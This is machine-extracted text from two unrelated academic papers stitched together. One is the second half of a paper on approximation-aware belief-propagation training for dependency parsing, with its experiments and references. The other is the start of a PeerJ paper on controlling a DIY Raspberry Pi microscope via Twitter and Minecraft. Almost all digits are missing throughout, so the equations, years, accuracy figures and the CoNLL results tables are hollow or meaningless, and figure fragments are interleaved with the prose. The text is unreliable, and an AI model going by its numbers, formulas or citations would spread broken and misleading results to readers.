messages at time tmax m (tmax) i→α (yi) = . . ., m (tmax) α→i (yi) = . . . m (tmax) ptree→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios · · · (c) messages at time t m (t) i→α(yi) = . . ., m (t) α→i(yi) = . . . m (t) ptree→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios · · · (c) messages at time t = m ( ) i→α(yi) = . . ., m ( ) α→i(yi) = . . . m ( ) ptree→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios (a) compute potentials ψα(yα) = exp(θ ·f(yα,x)) (b) initial messages m ( ) i→α(yi) = m ( ) α→i(yi) = (c. ) outgoing messages (c. ) inside-outside (c. ) message ratios (e. ) expected recall (e. ) inside-outside (e. ) anneal beliefs figure : feed-forward topology of inference, decoding, and loss. (e. –e. ) show the annealed risk, one of the objective functions we consider. using this distribution, we can replace our non- differentiable decoder hθ with a differentiable one (at training time). imagine that our new decoder stochastically returns a parse ŷ sampled from this distribution. we define the annealed risk as the ex- pected loss of that decoder: r /t θ (x,y ∗) = e ŷ∼q /t θ (· |x)[`(ŷ,y ∗)] ( ) as t → (“annealing”), the decoder almost always chooses the mbr parse, so our risk approaches the loss of the actual mbr decoder that will be used at test time. however, as a function of θ, it remains differentiable (though not convex) for any t > . to compute the annealed risk, observe that it sim- plifies to r /tθ (x,y ∗) = − ∑ i:y∗i =on q /t θ (ŷi = on |x). this is the negated expected recall of a parse ŷ ∼ q /tθ . we obtain the required marginals q /t θ (ŷi = on |x) from ( ) by running inside- recall from ( ) that the mbr parse is the tree ŷ that max- imizes the sum ∑ i:ŷi=on pθ(yi = on |x). as t → , the right-hand side of ( ) grows fastest for this ŷ, so its probabil- ity under q /tθ approaches (or /k if there is a k-way tie for mbr parse). outside where the edge weight for edge i is given by exp(pθ(yi = on |x)/t). whether our test-time system computes the marginals of pθ exactly or does so approximately via bp, our new training objective approaches (as t → ) the true empirical risk of the test-time parser that performs mbr decoding from the computed marginals. empirically, however, we will find that it is not the most effective training objective (§ . ). stoyanov et al. ( ) postulate that the nonconvex- ity of empirical risk may make it a difficult function to optimize, even with annealing. our next two ob- jectives provide alternatives. . l distance we can view our inference, decoder, and loss as defining a form of deep neural network, whose topology is inspired by our linguistic knowledge of the problem (e.g., the edge variables should define a tree). this connection to deep learning allows us to consider training methods akin to supervised layer-wise training (bengio et al., ). we tem- porarily remove the top layers of our network (i.e. the decoder and loss module, fig. (e)) so that the output layer of our “deep network” consists of the variable beliefs bi(yi) from bp. we can then de- fine a supervised loss function directly on these be- liefs. we don’t have supervised data for this layer of beliefs, but we can create it artificially. use the supervised parse y∗ to define “target beliefs” by b∗i (yi) = i(yi = y ∗ i ) ∈ { , }. to find parame- ters θ that make bp’s beliefs close to these targets, we can minimize an l distance loss function: j(θ;x,y∗) = ∑ i ∑ yi (bi(yi)− b∗i (yi)) ( ) we can use this l distance objective function for training, adding the mbr decoder and loss evalua- tion back in only at test time. . layer-wise training just as in layer-wise training of neural networks, we can take a two-stage approach to training. first, we train to minimize the l distance. then, we use the resulting θ as initialization to optimize the annealed risk, which does consider the decoder and loss func- tion (i.e. the top layers of fig. ). stoyanov et al. ( ) found mean squared error (mse) to give a smoother training objective, though still nonconvex, and used it to initialize empirical risk. though their variant of the l objective did not completely dis- pense with the decoder as ours does, it is a similar approach to our proposed layer-wise training. gradients by backpropagation backpropagation computes the derivative of any given function specified by an arbitrary circuit con- sisting of elementary differentiable operations (e.g. +,−,×,÷, log,exp). this is accomplished by re- peated application of the chain rule. backpropagat- ing through an algorithm proceeds by similar ap- plication of the chain rule, where the intermediate quantities are determined by the topology of the circuit—just as in figure . running backwards through the circuit, backprop computes the partial derivatives of the objective j(θ;x,y∗) with respect to each intermediate quantity u—or more concisely the adjoint of u: ðu = ∂j(θ;x,y ∗) ∂u . this section gives a summary of the adjoint computations we re- quire. due to space constraints, we direct the reader to the extended version of this paper (gormley et al., a) for full details of all the adjoints. . backpropagation of decoder / loss the adjoint of the objective itself ðj(θ;x,y∗) is al- ways . so the first adjoints we must compute are those of the beliefs: ðbi(yi) and ðbα(yα). this cor- responds to the backward pass through figure (e). consider the simple case where j is l distance from ( ): the variable belief adjoint is ðbi(yi) = (bi(yi)−b∗i (yi)) and trivially ðbα(yα) = . if j is annealed risk from ( ), we compute ðbi(yi) by ap- plying backpropagation recursively to our algorithm for j from § . . this sub-algorithm defines a sub- circuit depicted in figure (e. –e. ). the compu- tations of the annealed beliefs and the expected re- call are easily differentiable. the main challenge is differentiating the function computed by the inside- outside algorithm; we address this in § . . . backpropagation through structured bp given the adjoints of the beliefs, we next back- propagate through structured bp—extending prior work which did the same for regular bp (eaton and ghahramani, ; stoyanov et al., ; domke, ). except for the messages sent from the ptree factor, each step of bp computes some value from earlier values using the update equa- tions ( )–( ). backpropagation differentiates these elementary expressions. first, using the belief ad- joints, we compute the adjoints of the final mes- sages (ðm(tmax)j→α (yj), ðm (tmax) β→i (yi)) by applying the chain rule to eqs. ( ) and ( ). this is the backward pass through fig. (d). recall that the messages at time t were computed from messages at time t − and the potential functions ψα in the forward pass via eqs. ( ) and ( ). backprop works in the oppo- site order, updating the adjoints of the messages at time t− and the potential functions (ðm(t− )j→α (yj), ðm(t− )β→i (yi), ðψα(yα)) only after it has computed the adjoints of the messages at time t. repeating this through timesteps {t,t − , . . . , } constitutes the backward pass through fig. (c). the backward pass through fig. (b) does nothing, since the mes- sages were initialized to a constant. the final step of backprop uses ðψα(yα) to compute ðθj—the back- ward pass through fig. (a). for the explicit for- mula of these adjoints, see gormley et al. ( a) or appendix a. of stoyanov et al. ( ). the next section handles the special case of ðm(t)j→ptree(yj). . bp and backpropagation with ptree the ptree factor has a special structure that we exploit for efficiency during bp. smith and eis- ner ( ) give a more efficient way to implement eq. ( ), which computes the message from a fac- tor α to a variable yi, in the special case where α = ptree. they first run the inside-outside al- gorithm where the edge weights are given by the ra- tios of the messages to ptree: m (t) i→α(on) m (t) i→α(off) . then they multiply each resulting edge marginal given by inside-outside by the product of all the off mes- sages ∏ i m (t) i→α(off) to get the marginal factor be- lief bα(yi). finally they divide the belief by the in- coming message m(t)i→α(on) to get the correspond- ing outgoing message m(t+ )α→i (on). these steps are shown in figure (c. –c. ), and are repeated each time we send a message from the ptree factor. similarly, we exploit the structure of this algo- rithm to compute the adjoints ðm(t)j→ptree(yj). the derivatives of the message ratios and products men- tioned here are simple. in the next subsection, we explain how to backpropagate through the inside- outside algorithm. though we focus here on pro- jective dependency parsing, our techniques are also applicable to non-projective parsing and the tree factor; we leave this to future work. . backprop of hypergraph inside-outside both the annealed risk loss function (§ . ) and the computation of messages from the ptree factor (§ . ) use the inside-outside algorithm for depen- dency parsing. here we describe inside-outside and the accompanying backpropagation algorithm over a hypergraph. this general treatment (klein and man- ning, ; li and eisner, ) enables our method to be applied to other tasks such as constituency parsing, hmm forward-backward, and hierarchical machine translation. in the case of dependency pars- ing, the structure of the hypergraph is given by the dynamic programming algorithm of eisner ( ). for the forward pass of the inside-outside mod- ule, the input variables are the hyperedge weights we∀e and the outputs are the marginal probabilities pw(i)∀i of each node i in the hypergraph. the latter are a function of the inside βi and outside αj proba- bilities. we initialize αroot = . βi = ∑ e∈i(i) we ∏ j∈t(e) βj ( ) αj = ∑ e∈o(i) we αh(e) ∏ j∈t(e):j =i βj ( ) pw(i) = αiβi/βroot ( ) for each node i, we define the set of incoming edges i(i) and outgoing edges o(i). the antecedents of the edge are t(e), the parent of the edge is h(e), and its weight is we. for the backward pass of the inside-outside module, the inputs are ðpw(i)∀i and the outputs are ðwe∀e. we also compute the adjoints of the inter- mediate quantities ðβj,ðαi. we first compute ðαi bottom-up. next ðβj are computed top-down. the adjoints ðwe are then computed in any order. ðαi = ðpw(i) ∂pw(i) ∂αi + ∑ e∈i(i) ∑ j∈t(e) ðαj ∂αj ∂αi ( ) ðβroot = ∑ i =root ðpw(i) ∂pw(i) ∂βroot ( ) ðβj = ðpw(j) ∂pw(j) ∂βj + ∑ e∈o(j) ðβh(e) ∂βh(e) ∂βj + ∑ e∈o(j) ∑ k∈t(e):k =j ðαk ∂αk∂βj ∀j = root ( ) ðwe = ðβh(e) ∂βh(e) ∂we + ∑ j∈t(e) ðαj ∂αj ∂we ( ) the partial derivatives required for the above ad- joints are given in the extended version of this pa- per (gormley et al., a). this backpropagation method is used for both figure (c. ) and (e. ). other learning settings loss-aware training with exact inference backpropagating through inference, decoder, and loss need not be restricted to approximate inference algorithms. li and eisner ( ) optimize bayes risk with exact inference on a hypergraph for machine translation. each of our differentiable loss functions (§ ) can also be coupled with exact inference. for a first-order parser, bp is exact. yet, in place of modules (b), (c), and (d) in figure , we can use a standard dynamic programming algorithm for dependency parsing, which is simply another instance of inside-outside on a hypergraph (§ . ). the exact marginals from inside-outside ( ) are then fed forward into the decoder/loss module (e). conditional and surrogate log-likelihood the standard approach to training is conditional log- likelihood (cll) maximization (smith and eisner, ) without taking inexact inference into account: j(θ;x,y∗) = − log pθ(y |x). when inference is exact, this baseline computes the true gradient of cll. when inference is approximate, this base- line uses the factor beliefs bα(yα) from bp in place of the exact marginals in the gradient. the liter- ature refers to this approximation-unaware training method as surrogate likelihood training since it re- turns the “wrong” parameters even under the as- sumption of infinite training data drawn from the model being used (wainwright, ). despite this, the surrogate likelihood objective is commonly used to train crfs. cll and approximation-aware train- ing are not mutually exclusive. training a standard factor graph with erma and a log-likelihood objec- tive recovers cll exactly (stoyanov et al., ). experiments . setup features as the focus of this work is on a novel approach to training, we look to prior work for model and feature design (§ ). we add o(n ) second-order grandparent and arbitrary-sibling fac- tors as in riedel and smith ( ) and martins et al. ( ). we use standard feature sets for first-order (mcdonald et al., ) and second-order (carreras, ) parsing. following rush and petrov ( ), we also include a version of each part-of-speech (pos) tag feature, with the coarse tags from petrov et al. ( ). we use feature hashing (ganchev and dredze, ; weinberger et al., ) and restrict to at most million features. we leave the incor- poration of third-order features to future work. pruning to reduce the time spent on feature ex- traction, we enforce the type-specific dependency length bounds from eisner and smith ( ) as used by rush and petrov ( ): the maximum allowed dependency length for each tuple (parent tag, child tag, direction) is given by the maximum observed length for that tuple in the training data. follow- ing koo and collins ( ), we train a first-order model with cll and for each token prune any par- ents for which the marginal probability is less than . times the maximum parent marginal for that token. on a per-token basis, we further restrict to the ten parents with highest marginal probability as in martins et al. ( ) (but we avoid pruning the fully right-branching tree, so that some parse always exists). this lets us simplify the factor graph, re- moving variables yi corresponding to pruned edges and specializing their factors to assume yi = off. we train the full model’s parameters to work well on this pruned graph. data we consider languages from the conll- (buchholz and marsi, ) and conll- (nivre et al., ) shared tasks. we also convert the english penn treebank (ptb) (marcus et al., ) to dependencies using the head rules from ya- mada and matsumoto ( ) (ptb-ym). we evalu- ate unlabeled attachment accuracy (uas) using gold the pruning model uses a simpler feature set as in rush and petrov ( ). pruning is likely the least impactful of our approximations: it obtains . % oracle uas for english. . . . . . . u a s # iterations of bp cll l l +ar figure : speed/accuracy tradeoff of english ptb-ym uas vs. the total number of bp iterations tmax for standard conditional likelihood training (cll) and our approximation-aware training with either an l objective (l ) or a staged training of l followed by annealed risk (l +ar). note that the x-axis shows the number of iter- ations used for both training and testing. we use a nd- order model with grand.+sib. factors. pos tags for the conll languages, and predicted tags from turbotagger (martins et al., ) for the ptb. unlike most prior work, we hold out % of each conll training dataset as development data for regularization by early stopping. some of the conll languages contain non- projective edges, but our system is built using a probability distribution over projective trees only. erma can still be used with such a badly misspec- ified model—one of its advantages—but no amount of training can raise cll’s objective above −∞, since any non-projective gold tree will always have probability . thus, for cll only, we replace each gold tree in training data with a minimum-loss projective tree (carreras, ). this resembles erma’s goal of training the system to find a low- loss projective tree. at test time, we always evaluate the system’s projective output trees against the pos- sibly non-projective gold trees, as in prior work. learning settings we compare three learning set- tings. the first, our baseline, is conditional log- in dev experiments, we found l distance to be less sensi- tive to the ` -regularizer weight than cll. so we added addi- tional regularization by early stopping to improve cll. we also ran a controlled experiment with l and not just cll trained on these projectivized trees: the average margin of improvement for our method widened very slightly. . . . unary grand. sib. grand.+sib. u a s cll l l +ar figure : english ptb-ym uas vs. the types of nd- order factors included in the model for approximation- aware training and standard conditional likelihood train- ing. all models include st-order factors (unary). the nd-order models include grandparents (grand.), arbi- trary siblings (sib.), or both (grand.+sib.)—and use iterations of bp. likelihood training (cll) (§ ). as is common in the literature, we conflate two distinct learning settings (conditional log-likelihood/surrogate log- likelihood) under the single name “cll,” allowing the inference method (exact/inexact) to differentiate them. the second learning setting is approximation- aware learning (§ ) with either our l distance ob- jective (l ) (§ . ) or our layer-wise training method (l +ar) which takes the l -trained model as an ini- tializer for our annealed risk (§ . ). the annealed risk objective requires an annealing schedule: over the course of training, we linearly anneal from ini- tial temperature t = . to t = . , updat- ing t at each step of stochastic optimization. the third learning setting uses the same two objectives, l and l +ar, but with exact inference (§ ). the ` -regularizer weight in ( ) is λ = . each method is trained by adagrad for epochs with early stopping (i.e. the model with the highest score on dev data is returned). across conll, the average epoch chosen for cll was . and for l was . . the learning rate for each training run is dynamically tuned on a sample of the training data. . results our goal is to demonstrate that our approximation- aware training method leads to improved parser ac- curacy as compared with the standard training ap- proach of conditional log-likelihood (cll) maxi- mization (smith and eisner, ), which does not take inexact inference into account. the two key findings of our experiments are that our learning ap- proach is more robust to ( ) decreasing the number of iterations of bp and ( ) adding additional cycles to the factor graph in the form of higher-order fac- tors. in short: our approach leads to faster inference and creates opportunities for more accurate parsers. speed-accuracy tradeoff our first experiment is on english dependencies. for english ptb-ym, figure shows accuracy as a function of the num- ber of bp iterations for our second-order model with both arbitrary sibling and grandparent factors on en- glish. we find that our training methods (l and l +ar) obtain higher accuracy than standard train- ing (cll), particularly when a small number of bp iterations are used and the inference is a worse ap- proximation. notice that with just two iterations of bp, the parsers trained by our approach obtain ac- curacy greater than or equal to those by cll with any number of iterations ( to ). contrasting the two objectives for our approximation-aware train- ing, we find that our simple l objective performs very well. in fact, in only two cases, at and itera- tions, does risk annealing (l +ar) further improve performance on test data. in our development exper- iments, we also evaluated ar without using l for initialization and we found that it performed worse than either of cll and l alone. that ar performs only slightly better than l (and not worse) in the case of l +ar is likely due to early stopping on dev data, which guards against selecting a worse model. increasingly cyclic models figure contrasts accuracy with the type of nd-order factors (grand- parent, sibling, or both) included in the model for english, for a fixed budget of bp iterations. adding higher-order factors introduces more loops, making the loopy bp approximation more problem- atic for standard cll training. by contrast, under approximation-aware training, enriching the model with more factors always helps performance, as de- sired, rather than hurting it. notice that our advantage is not restricted to the case of loopy graphs. even when we use a st- order model, for which bp inference is exact, our approach yields higher-accuracy parsers than cll training. we speculate that this improvement is due to our method’s ability to better deal with model train inference dev uas test uas cll exact . . cll bp iters . . l exact . . l bp iters . . table : the impact of exact vs. approximate inference on a nd-order model with grandparent factors only. re- sults are for the development (§ ) and test (§ ) sec- tions of ptb-ym. misspecification—a first-order model is quite mis- specified! note the following subtle point: when inference is exact, the cll estimator is actually a special case of our approximation-aware learner— that is, cll computes the same gradient that our training by backpropagation would if we used log- likelihood as the objective. exact inference with grandparents § noted that since we always do mbr decoding, the ideal strategy is to fit the true distribution with a good model. consider a “good model” that includes unary and grandparent factors. exact inference is possible here in o(n ) time by dynamic programming (koo and collins, , model ). table shows that cll training with exact inference indeed does well on test data—but that accuracy falls if we substitute fast approximate inference ( iterations of bp). our proposed l training is able to close the gap, just as intended. that is, we succesfully train a few itera- tions of an approximate o(n ) algorithm to behave as well as an exact o(n ) algorithm. other languages our final experiments train and test our parsers on languages from conll- / (table ). we find that, on average across languages, approximation-aware training with an l objective obtains higher uas than cll training. this result holds for both our poorest model ( st- order) and our richest one ( nd-order with grandpar- ent and sibling factors), using , , , or iterations of bp. notice that the approximation-aware train- ing doesn’t always outperform cll training—only in the aggregate. again, we see the trend that our training approach yields larger gains when bp is re- stricted to a small number of maximum iterations. it is possible that larger training sets would also favor our approach, by providing a clearer signal of how to reduce the objective ( ). st-order nd-order (with given num. bp iterations) language cll l − cll cll l − cll cll l − cll cll l − cll cll l − cll ar . - . . + . . - . . + . . - . bg . - . . - . . + . . + . . - . ca . + . . + . . + . . + . . + . cs . - . . + . . + . . + . . + . da . - . . - . . + . . - . . - . de . + . . . . + . . - . . - . el . - . . + . . + . . - . . - . en . + . . + . . + . . + . . + . es . - . . - . . + . . - . . + . eu . + . . + . . + . . - . . - . hu . - . . + . . + . . + . . + . it . + . . + . . + . . - . . - . ja . + . . + . . - . . - . . + . nl . + . . + . . + . . - . . - . pt . + . . - . . + . . + . . + . sl . + . . + . . + . . + . . + . sv . + . . - . . + . . + . . + . tr . - . . - . . - . . - . . - . zh . - . . + . . + . . + . . + . avg. . + . . + . . + . . + . . + . table : results on languages from conll- / . for languages appearing in both datasets, the version was used, except for chinese (zh). evaluation follows the conventions and excludes punctuation. we report absolute uas for the baseline (cll) and the improvement in uas for l over cll (l − cll) with positive/negative differences in blue/red. the average uas and average difference across all languages (avg.) is given. discussion the purpose of this work was to explore erma and related training methods for models which incorpo- rate structured factors. we applied these methods to a basic higher-order dependency parsing model, because that was the simplest and first instance of structured bp (smith and eisner, ). in future work, we hope to explore further models with struc- tured factors—particularly those which jointly ac- count for multiple linguistic strata (e.g. syntax, se- mantics, and topic). another natural extension of this work is to explore other types of factors: here we considered only log-linear potential functions (com- monly used in crfs), but any differentiable func- tion would be appropriate, such as a neural network (durrett and klein, ; gormley et al., b). our primary contribution is approximation-aware training for structured bp. we have specifically presented message-passing formulas for any factor whose belief’s partition function can be computed as the total weight of all hyperpaths in a weighted hypergraph. this would suffice to train the struc- tured bp systems that have been built for projective dependency parsing (smith and eisner, ), cnf grammar parsing (naradowsky et al., ), tag (auli and lopez, ), itg-constraints for phrase extraction (burkett and klein, ), and graphical models over strings (dreyer and eisner, ). conclusions we introduce a new approximation-aware learning framework for belief propagation with structured factors. we present differentiable objectives for both empirical risk minimization (à la erma) and a novel objective based on l distance between the in- ferred beliefs and the true edge indicator functions. experiments on the english penn treebank and languages from conll- / shows that our estimator is able to train more accurate dependency parsers with fewer iterations of belief propagation than standard conditional log-likelihood training, by taking approximations into account. for additional details, see the tech report version of this paper (gormley et al., a). our code is available in a general-purpose library for structured bp, hyper- graphs, and backprop (gormley, ). acknowledgments this research was funded by the human language technology center of excel- lence at johns hopkins university. thanks to the anonymous reviewers for their insightful comments. references michael auli and adam lopez. . a comparison of loopy belief propagation and dual decomposition for integrated ccg supertagging and parsing. in proceed- ings of acl. mohit bansal, david burkett, gerard de melo, and dan klein. . structured learning for taxonomy induc- tion with belief propagation. in proceedings of acl. yoshua bengio, pascal lamblin, dan popovici, and hugo larochelle. . greedy layer-wise training of deep networks. in b. schölkopf, j.c. platt, and t. hoffman, editors, advances in neural information processing systems . peter j. bickel and kjell a. doksum. . mathe- matical statistics: basic ideas and selected topics. holden-day inc., oakland, ca, usa. sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of conll. david burkett and dan klein. . fast inference in phrase extraction models with belief propagation. in proceedings of naacl-hlt. xavier carreras. . experiments with a higher-order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll . justin domke. . implicit differentiation by pertur- bation. in advances in neural information processing systems. justin domke. . parameter learning with truncated message-passing. in proceedings of the ieee con- ference on computer vision and pattern recognition (cvpr). markus dreyer and jason eisner. . graphical mod- els over multiple strings. in proceedings of emnlp. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research. greg durrett and dan klein. . neural crf parsing. in proceedings of acl. frederik eaton and zoubin ghahramani. . choos- ing a variable to clamp. in proceedings of aistats. jason eisner and noah a. smith. . parsing with soft and hard constraints on dependency length. in proceedings of the international workshop on parsing technologies (iwpt). jason eisner. . three new probabilistic models for dependency parsing: an exploration. in proceedings of coling. brendan j. frey, frank r. kschischang, hans-andrea loeliger, and niclas wiberg. . factor graphs and algorithms. in proceedings of the annual allerton conference on communication control and comput- ing, volume . kuzman ganchev and mark dredze. . small sta- tistical models by random feature mixing. in proceed- ings of the acl hlt workshop on mobile language processing. joshua goodman. . efficient algorithms for parsing the dop model. in proceedings of emnlp. matthew r. gormley, mark dredze, and jason eis- ner. a. approximation-aware dependency parsing by belief propagation (extended version). technical report available from arxiv.org as arxiv: . . matthew r. gormley, mo yu, and mark dredze. b. improved relation extraction with feature-rich com- positional embedding models. in proceedings of emnlp. matthew r. gormley. . pacaya—a graphical mod- els and nlp library. available from https:// github.com/mgormley/pacaya. andreas griewank and george f. corliss, editors. . automatic differentiation of algorithms: theory, im- plementation, and application. siam, philadelphia, pa. liang huang, suphan fayong, and yang guo. . structured perceptron with inexact search. in proceed- ings of naacl-hlt. dan klein and christopher d. manning. . parsing and hypergraphs. in proceedings of the international workshop on parsing technologies (iwpt). terry koo and michael collins. . efficient third- order dependency parsers. in proceedings of acl. frank r. kschischang, brendan j. frey, and hans- andrea loeliger. . factor graphs and the sum- product algorithm. ieee transactions on information theory, ( ). alex kulesza and fernando pereira. . structured learning with approximate inference. in advances in neural information processing systems. zhifei li and jason eisner. . first- and second-order expectation semirings with applications to minimum- risk training on translation forests. in proceedings of emnlp. mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ). arxiv.org https://github.com/mgormley/pacaya https://github.com/mgormley/pacaya andré f. t. martins, noah a. smith, and eric p. xing. . concise integer linear programming formula- tions for dependency parsing. in proceedings of acl- ijcnlp. andré f. t. martins, noah a. smith, eric p. xing, pe- dro m. q. aguiar, and mário a. t. figueiredo. . turbo parsers: dependency parsing by approximate variational inference. in proceedings of emnlp. andré f. t. martins, miguel b. almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in proceedings of acl. ryan mcdonald and fernando pereira. . on- line learning of approximate dependency parsing al- gorithms. in proceedings of eacl. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of acl. kevin p. murphy, yair weiss, and michael i. jordan. . loopy belief propagation for approximate in- ference: an empirical study. in proceedings of uai. jason naradowsky, tim vieira, and david a. smith. . grammarless parsing for joint inference. in proceedings of coling. joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp-conll . slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of lrec. sebastian riedel and david a. smith. . relaxed marginal inference and its application to dependency parsing. in proceedings of naacl-hlt. david e. rumelhart, geoffrey e. hinton, and ronald j. williams. . learning internal representations by error propagation. in david e. rumelhart and james l. mcclelland, editors, parallel distributed processing: explorations in the microstructure of cognition, volume . mit press. alexander m. rush and slav petrov. . vine pruning for efficient multi-pass dependency parsing. in pro- ceedings of naacl-hlt. david a. smith and jason eisner. . minimum-risk annealing for training log-linear models. in proceed- ings of coling-acl. david a. smith and jason eisner. . dependency parsing by belief propagation. in proceedings of emnlp. veselin stoyanov and jason eisner. . minimum-risk training of approximate crf-based nlp systems. in proceedings of naacl-hlt. veselin stoyanov, alexander ropson, and jason eis- ner. . empirical risk minimization of graphi- cal model parameters given approximate inference, de- coding, and model structure. in proceedings of ais- tats. martin j. wainwright. . estimating the “wrong” graphical model: benefits in the computation-limited setting. the journal of machine learning research, . kilian weinberger, anirban dasgupta, john langford, alex smola, and josh attenberg. . feature hash- ing for large scale multitask learning. in proceedings of icml. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in proceedings of the international workshop on parsing technologies (iwpt), volume . submitted february accepted november published december corresponding author andrew e. pelling, a@pellinglab.net, apelling@uottawa.ca academic editor feng xia additional information and declarations can be found on page doi . /peerj-cs. copyright leblanc-latour et al. distributed under creative commons cc-by . open access utilizing social media and video games to control #diy microscopes maxime leblanc-latour , craig bryan and andrew e. pelling , , , department of physics, university of ottawa, ottawa, ontario, canada department of biology, university of ottawa, ottawa, ontario, canada institute for science, society and policy, university of ottawa, ottawa, ontario, canada symbiotica and the school of anatomy, physiology and human biology, university of western australia, perth, western australia, australia abstract open-source lab equipment is becoming more widespread with the popularization of fabrication tools such as d printers, laser cutters, cnc machines, open source microcontrollers and open source software. although many pieces of common laboratoryequipmenthavebeendeveloped,softwarecontroloftheseitemsissometimes lacking. specifically, control software that can be easily implemented and enable user-input and control over multiple platforms (pc, smartphone, web, etc.). the aim of this proof-of principle study was to develop and implement software for the control of a low-cost, d printed microscope. here, we present two approaches which enable microscope control by exploiting the functionality of the social media platform twitter or player actions inside of the videogame minecraft. the microscope was constructed from a modified web-camera and implemented on a raspberry pi computer. three aspects of microscope control were tested, including single image capture, focus control and time-lapse imaging. the twitter embodiment enabled users to send ‘tweets’ directly to the microscope. image data acquired by the microscope was then returned to the user through a twitter reply and stored permanently on the photo-sharing platform flickr, along with any relevant metadata. local control of the microscope was also implemented by utilizing the video game minecraft, in situations where internet connectivity is not present or stable. a virtual laboratory was constructed inside the minecraft world and player actions inside the laboratory were linked to specific microscope functions. here, we present the methodology and results of these experiments and discuss possible limitations and future extensions of this work. subjects network science and online social networks, social computing keywords microscope, do-it-yourself, open source, raspberry pi, twitter, flickr introduction the general interest in using and developing low cost, open source labware is gaining considerable traction in garages, academic labs and commercial spaces (baden et al., ; keulartz & van den belt, ). this is largely being driven by the so-called ‘‘maker movement’’ in which people are now exploiting the widespread popularity and accessibility of fabrication tools ( d printers, laser cutters, cnc machines, etc.) and open source electronics (arduino, raspberry pi, etc) to build simple and advanced scientific equipment how to cite this article leblanc-latour et al. ( ), utilizing social media and video games to control #diy microscopes. peerj com- put. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:a@pellinglab.net mailto:apelling@uottawa.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. for a diversity of applications (pearce, ). designs and instructions are shared freely, typically under some form of open source license, and generally undergo several rounds of improvement as a result of the contributions from other users. importantly, such innovations have matured to a level that it is possible to setup a basic, functional, laboratory space at extremely low cost. in addition, the spirit of ‘‘frugal science’’ has led to several innovations in low cots diagnostic tools, often built around cell phone platforms. these approaches have the important potential for lowering the cost of diagnosis and treatment of diseases in both developed and developing countries. in the context of the biological sciences, the ‘‘do-it-yourself biology (diybio) movement’’hasdriven thedevelopmentofseveral toolsthatarecritical inanycell/molecular biology laboratory (landrain et al., ). this includes open source pipettes (baden, ), centrifuges (wong et al., ), water baths (garvey, ), stirrers and hot plates (watts, ), shakers (miller, ), electrophoresis kits (long, ), incubators (pelling, ), pcr (chai biotechnologies inc., a; wong et al., ) and qpcr (chai biotechnologies inc., b) machines, and low cost kits for manipulating dna or transforming bacteria (synbiota, ). one other key piece of equipment is a light microscope. several designs and approaches have been developed for creating low cost light microscopes with reasonable magnification (cybulski, clements & prakash, ). such designs have resulted in microscopes that can operate in a variety of modalities including bright field, dark field and fluorescence (cybulski, clements & prakash, ; mcleod & ozcan, ). cellphone based microscopes have been developed in which the phone’s camera is simply employed as the imaging sensor (contreras-naranjo, wei & ozcan, ). these approaches either mount a low cost set of optics directly to the cellphone camera (zhu et al., ) or mount the cell phone onto a simplified microscope stand that employs microscope objectives (skandarajah et al., ). alternatively, discarded webcams can be converted into the microscope by taking apart the camera and simply flipping the lens in front of the imaging sensor (switz, d’ambrosio & fletcher, ), or placing a low cost ball lens in front of an imaging sensor or the eye (smith et al., ). lenses can also be sourced from a discarded cd-rom drive or an optical mouse (cavanihac, ; ibanez, ). the ability to generate functional, low cost microscopes is made more attractive as they can be simply produced from discarded electronics. indeed, the simplest embodiment of a diy microscope can be achieved by simply placing a water drop on the cellphone front facing camera. these various approaches are not only important for educational purposes, but also have a significant role to play in developing low cost diagnostic tools for the lab or the field (landrain et al., ; baden, ; wong et al., ; garvey, ; watts, ; miller, ; long, ; pelling, ; chai biotechnologies inc., a; wong et al., ; chai biotechnologies inc., b; synbiota, ; cybulski, clements & prakash, ; mcleod & ozcan, ; contreras-naranjo, wei & ozcan, ; zhu et al., ; skandarajah et al., ; switz, d’ambrosio & fletcher, ; smith et al., ; cavanihac, ; ibanez, ; kim, gerber & riedel-kruse, ). as low-cost imaging tools (and general labware) become more prevalent there is an increasing need for the development of software control and monitoring solutions. in order to employ a diy microscope in a research setting, one may desire the ability to conduct leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. imaging experiments without having to be physically present at the microscope in order initiate image capture. for example, conducting time-lapse experiments of cell growth on a microscope has been placed inside of a sterile, temperature and atmospherically controlled incubator. therefore, the purpose and objective of this study was to develop a general proof of-principle approach and physical embodiment of diy microscope control that relies on freely available programs that can be installed on a pc or cellphone. in order to achieve these goals, we first constructed a basic diy microscope by modifying the popular rapsberry pi (rpi) camera to act as an objective (switz, d’ambrosio & fletcher, ). a d printed case for the rpi computer and camera was designed and contructuted to form a microscope stand. finally, a dvd-rom drive was used to create a moveable sample stage, allowing for focus control. sample positioning along the optical axis of the microscope and image capture was controlled by a python script. once the diy microscope was constructed, we developed user interfaces by exploiting three popular existing applications and their available application program interfaces (apis). here, we demonstrate the ability to use the popular twitter interface to send commands to an internet connected diy microscope. we also implemented online data storage by uploading captured images, along with important metadata, to the photo- sharing network flickr. in this scenario, the diy microscope was assigned a twitter account (@diymicroscope), which monitored for simple commands sent by any other twitter user. simple message syntax was developed in order to allow other user to adjust microscope focus, capture single images or initiate time-lapse recordings. upon image capture, all data was stored on a publically accessible flickr account. in a second embodiment, we developed an approach to control a local diy microscope by exploiting the api of the popular video game minecraft. here, we first constructed a virtual lab inside of the minecraft world. in this scenario, one is able to ‘‘play’’ within this 